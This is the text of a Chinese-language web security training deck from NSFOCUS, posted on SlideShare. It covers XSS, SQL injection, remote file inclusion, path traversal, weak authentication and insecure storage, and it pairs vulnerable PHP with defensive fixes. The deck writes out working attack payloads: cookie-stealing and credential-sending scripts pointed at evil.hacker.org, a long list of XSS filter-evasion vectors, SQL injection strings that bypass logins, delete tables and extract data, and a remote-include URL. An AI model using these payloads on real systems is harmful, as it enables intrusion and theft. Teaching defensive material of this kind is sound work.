Penetration test Software developer Security analyst Security consultation Whatever
跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
入侵技术交流 防御 XSS
 
1.  攻击者向服务器插入恶意代码 2.  数据库存储恶意代码 姚明… 3.  互联网用户点击主题 4.  数据传送给互联网用户 5.  浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <sc...
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国...
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国...
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国...
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队...
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> <...
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <B...
<Font size=5> Update your email address</ font>  <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http:/...
<Font size=5> Update your email address</ font>  <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http:/...
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密  码: </HTML> 刘翔… ..... 郑...
… <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&q...
<INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;><script>alert('xss')</script> <INPUT TYPE=&quot;image&quot; S...
<ul><ul><li>   Danger </li></ul></ul>replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quo...
<INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > <ul><ul><li>   Evil </li></ul></ul>Dim re     Set r...
<INPUT TYPE=&quot;image&quot; SRC=javascript&#58alert(&quot;xss&quot;)> <ul><ul><li>   Evil </li></ul></ul><ul><ul><li> ...
<img src=&quot;javas cript:alert('xss')&quot;> <ul><ul><li>   Evil </li></ul></ul><ul><ul><li>   Danger </li></ul></ul>r...
http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%6...
function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace...
<img src=&quot;#&quot; onerror=alert(/xss/)> <ul><ul><li>   Evil </li></ul></ul><img src=&quot;#&quot; style=“evil:expres...
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器  replace(str, safer,  danger) …… …… <ul><ul><li>事前 </li></ul></ul>Htmlspecialchars ($html, ...
<ul><ul><li>   Danger </li></ul></ul><ul><ul><li>   Danger </li></ul></ul>
POST  / thepage.jsp?var1=page1.html  HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us...
‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
<input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&q...
<link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
<meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javas...
<body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
<div onmouseenter='danger();'>
<object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div s...
[IE]   <div style=&quot;behaviour: url( [link to code] );&quot;>  [Mozilla] <div style=&quot;binding: url( [link to code] ...
Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentiti...
<?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘
’; // Allow <p><i><s> print str...
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;...
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;...
$_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['messa...
 
入侵技术交流 防御 SQL Injection
 
... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&...
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’  admin select * from user where us...
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’  ‘ ;Delete from users;/* select * ...
<Font size=5>Search page</font>  <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search....
select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘  orde...
<Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example...
update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 passw...
Get /query.php?name=Wong '  Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … <ul><ul><li>MYSQL SERVER 将 varc...
Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’  Error message: $debug = 1 …
show_source() highlight_string()  highlight_file() Other Show error message function… <ul><ul><li>   Take care </li></ul>...
1.  判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong '  Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web...
Get /query.asp?name= Wong  and  (select count(*) from admin)>=0 Get /query.asp?name= Wong  and  (select count(user) from a...
Get /query.asp?name= Wong  and  (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong  and  (select top 1 le...
Get /query.asp?name= Wong  and 1= (select  count(*) from admin where id=1  and mid(uaername,1,1)='a') Get /query.asp?name=...
1.  判断注入点 MYSQL SERVER!! Get /query.php?name=joe’  Get /query.php?name=joe’  and 1=1 Get /query.php?name=joe’  and 1=2 Web...
Get /query.php?name= joe’  and LENGTH(password)>‘5 Get /query.php?name= joe’  and LENGTH(password)<‘15 Get /query.php?name...
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= j...
Get /query.php?name= joe’  union select 1,1,1,1,1 from  root_user/* Get /query.php?name= admin’  union select 1,1,1,1,1 fr...
Get /query.php?name= joe’and  1<>1  union select 1,1,name,1,1,passwd,1  from admin_user /* 1.  判断注入点 2.  探测数据库结构 MSSQL SER...
Get  /query.php?name=  -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:oot.ini
合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案 <ul><ul><li>输入 </li></ul></ul><ul><ul><li>输入 </li></ul></ul>绕过客户端检查 否 ...
< > & ‘ “ + ; {Whitespace} % /  # Danger !
addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url...
入侵技术交流 防御 恶意文件执行
 
Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bi...
<?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=ht...
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?ph...
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?ph...
<ul><ul><li>   Right </li></ul></ul>allow_url_fopen allow_url_include($file) <ul><ul><li>   Advise </li></ul></ul><?php ...
Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success  Post file=passwd Success Post…
<?php //  从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfi...
<ul><ul><li>   Right </li></ul></ul><ul><ul><li>   Better </li></ul></ul><?php $username = $_SERVER['REMOTE_USER']; //  ...
<ul><ul><li>   And </li></ul></ul>只给  PHP  的  web  用户很有限的权限!
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject,...
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject,...
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print (...
入侵技术交流 防御 CSRF
 
1.  攻击者向服务器插入恶意代码 2.  数据库存储恶意代码 姚明… 3.  互联网用户访问网站 4.  互联网用户点击主题 5.  浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <scr...
Attacker Myspace <ul><ul><li>Post  <div style=“background:url()”> </li></ul></ul>Cool ! Post  <script.*> 、 onclick, 、 <a h...
入侵技术交流 防御 配置错误
Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $c...
<ul><ul><li>   Wrong </li></ul></ul>
<ul><ul><li>   Right </li></ul></ul>
php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_base...
入侵技术交流 防御 身份认证漏洞
Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php  用户: 密码: 确定  取消 Get /script.php?authorized=1 Suc...
<?php if (authenticated_user())  { $authorized = true; } if ($authorized)  {  include '/highly/sensitive/data.php';  } ......
<ul><ul><li>   Better </li></ul></ul><ul><ul><li>   Advise </li></ul></ul><?php $_SESSION['authenticated'] = false; if (...
<?php if (!isset($_SESSION['session_id']))  { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we...
入侵技术交流 防御 存储缺陷
Get /query.asp?name= admin  and 1= (select  count(*) from admin where id=1  and mid(password,1,1)='a') Get /query.asp?name...
Get /query.asp?name= admin  and 1= (select  count(*) from admin where id=1  and mid(uaername,1,1)=‘1') Get /query.asp?name...
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin  admin@#$%! …
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin  120a1b2649c88aef29edd2ffd7359d73 …
admin@#$%! 0x120a1b2649c88aef29edd2ffd7359d73 <ul><ul><li>   W rong </li></ul></ul><ul><ul><li>   Right </li></ul></ul>
<?php //  存储密码散列 $query  = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5(...
md5(uniqid(rand(), true)) <ul><ul><li>B etter than </li></ul></ul>md5(uniqid(rand()) <ul><ul><li>   C ookie </li></ul></ul>
Php.ini session.save_path <ul><ul><li>   S ession </li></ul></ul>
攻击技术交流 防御 HTTP 数据传输
Post Forum Message: 用户名 :  aa 密  码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 :  aa 密  码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 :  aa 密  码 : aa_passwd
Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 :  aa 密  码 : aa_pa...
Post Forum Message: 用户名 :  aa 密  码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
C lient Web Server Client Arp 病毒 登陆论坛 用户名 :  aa 密  码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 :  aa 密  码 : aa_pas...
Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
入侵技术交流 防御 访问控制缺陷
Get  /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= j...
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= j...
入侵技术交流 防御 WEB2.0 时代
用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript   浏览器   服务端 <ul...
<cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
攻 防
register_globals  magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
绿盟科技专业服务 代码审计服务 渗透测试服务
<?php $query  = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_qu...
<?php $query  = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password))...
Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。 <ul><...
<ul><ul><li>此广告位 招租 </li></ul></ul><ul><ul><li>请联系 68730606-8502 </li></ul></ul><ul><ul><li>按出价高低顺序约谈… </li></ul></ul>
 
Professional   Security Solution Provider Thanks!
Upcoming SlideShare
Loading in …5
×

Web安全解决方案V1.0

3,673 views

Published on

Published in: Technology
0 Comments
17 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,673
On SlideShare
0
From Embeds
0
Number of Embeds
16
Actions
Shares
0
Downloads
0
Comments
0
Likes
17
Embeds 0
No embeds

No notes for slide
  • Web安全解决方案V1.0

    1. 1. Penetration test Software developer Security analyst Security consultation Whatever
    2. 2. 跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
    3. 3. 入侵技术交流 防御 XSS
    4. 5. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    5. 6. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    6. 7. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    7. 8. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    8. 9. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    9. 10. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
    10. 11. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
    11. 12. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
    12. 13. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
    13. 14. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
    14. 15. … <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot; &quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
    15. 16. <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;><script>alert('xss')</script> <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;> <ul><ul><li> Normally </li></ul></ul><ul><ul><li> Evil </li></ul></ul>
    16. 17. <ul><ul><li> Danger </li></ul></ul>replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’ <ul><ul><li> Weak </li></ul></ul>
    17. 18. <INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > <ul><ul><li> Evil </li></ul></ul>Dim re     Set re=new RegExp     re.IgnoreCase =True     re.Global=True re.Pattern=&quot;javascript:&quot;     Str = re.replace(Str,&quot;javascript : &quot;)     re.Pattern=&quot;jscript:&quot;    Str = re.replace(Str,&quot;jscript : &quot;)     re.Pattern=&quot;vbscript:&quot;    Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing <ul><ul><li> N ot so good </li></ul></ul><ul><ul><li> Danger </li></ul></ul>javascript:
    18. 19. <INPUT TYPE=&quot;image&quot; SRC=javascript&#58alert(&quot;xss&quot;)> <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Danger </li></ul></ul>‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;) <ul><ul><li> Weak </li></ul></ul>
    19. 20. <img src=&quot;javas cript:alert('xss')&quot;> <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Danger </li></ul></ul>replace(str,“ ”,“&nbsp; “) <ul><ul><li> Weak </li></ul></ul>
    20. 21. http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>Wrong <ul><ul><li> Evillooking </li></ul></ul>
    21. 22. function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,''',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
    22. 23. <img src=&quot;#&quot; onerror=alert(/xss/)> <ul><ul><li> Evil </li></ul></ul><img src=&quot;#&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=&quot;#&quot;/**/onerror=alert(/xss/) > <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Evil </li></ul></ul>
    23. 24. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
    24. 25. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器  replace(str, safer, danger) …… …… <ul><ul><li>事前 </li></ul></ul>Htmlspecialchars ($html, ENT_QUOTES) …… <ul><ul><li>事中 </li></ul></ul>FireFox no script …… …… <ul><ul><li>事后 </li></ul></ul>
    25. 26. <ul><ul><li> Danger </li></ul></ul><ul><ul><li> Danger </li></ul></ul>
    26. 27. POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login <ul><ul><li>Danger </li></ul></ul>
    27. 28. ‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
    28. 29. <input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&quot;>...
    29. 30. <link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
    30. 31. <meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
    31. 32. <body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
    32. 33. <div onmouseenter='danger();'>
    33. 34. <object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
    34. 35. [IE] <div style=&quot;behaviour: url( [link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( [link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [xC0][xBC]script>[code][xC0][xBC]/script> <a href=&quot; javascript#[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <script>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
    35. 36. Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
    36. 37. <?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘ ’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot; &quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
    37. 38. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    38. 39. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href='test'&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    39. 40. $_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
    40. 42. 入侵技术交流 防御 SQL Injection
    41. 44. ... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in... &quot;; } ?> <ul><ul><li> </li></ul></ul>select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ <ul><ul><li> </li></ul></ul>用户: 密码: 确定 取消
    42. 45. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
    43. 46. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in… <ul><ul><li> Worse </li></ul></ul>用户: 密码: 确定 取消
